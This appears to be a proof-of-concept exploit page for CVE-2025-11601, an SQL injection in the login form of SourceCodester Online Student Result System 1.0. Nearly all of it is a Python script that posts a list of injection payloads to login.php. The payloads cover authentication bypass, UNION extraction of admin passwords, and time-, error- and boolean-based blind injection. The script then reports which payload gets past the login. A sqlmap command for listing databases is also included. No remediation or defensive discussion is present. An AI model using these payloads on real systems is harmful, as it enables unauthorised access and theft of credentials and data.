CVE-2025-11601：SourceCodester在线学生成绩系统SQL注入漏洞

# CVE-2025-11601 PoC - SourceCodester Online Student Result System 1.0 SQL Injection # Vulnerability Location: /login.php # Vulnerable Parameter: Username import requests TARGET_URL = "http://target-site.com/login.php" # SQL Injection payload to bypass authentication payloads = [ # Basic authentication bypass "' OR '1'='1' -- ", "' OR '1'='1' #", # Union-based injection to extract data "' UNION SELECT 1,2,3,4 -- ", "' UNION SELECT 1,admin,password,4 FROM users -- ", # Time-based blind injection "' OR SLEEP(5) -- ", # Error-based injection "' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e)) -- ", # Boolean-based blind injection "' AND 1=1 -- ", "' AND 1=2 -- " ] def exploit_sql_injection(target_url, payload): """ Exploit SQL injection in Username parameter of login.php """ data = { "username": payload, "password": "any_password", "login": "submit" } try: response = requests.post(target_url, data=data, timeout=10) return response except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None # Example usage with sqlmap # sqlmap -u "http://target-site.com/login.php" --data="username=admin&password=test&login=submit" -p username --dbs if __name__ == "__main__": for payload in payloads: print(f"[*] Testing payload: {payload}") response = exploit_sql_injection(TARGET_URL, payload) if response and response.status_code == 200: if "dashboard" in response.text.lower() or "welcome" in response.text.lower(): print(f"[+] Successful bypass with payload: {payload}") break else: print(f"[-] Payload did not work")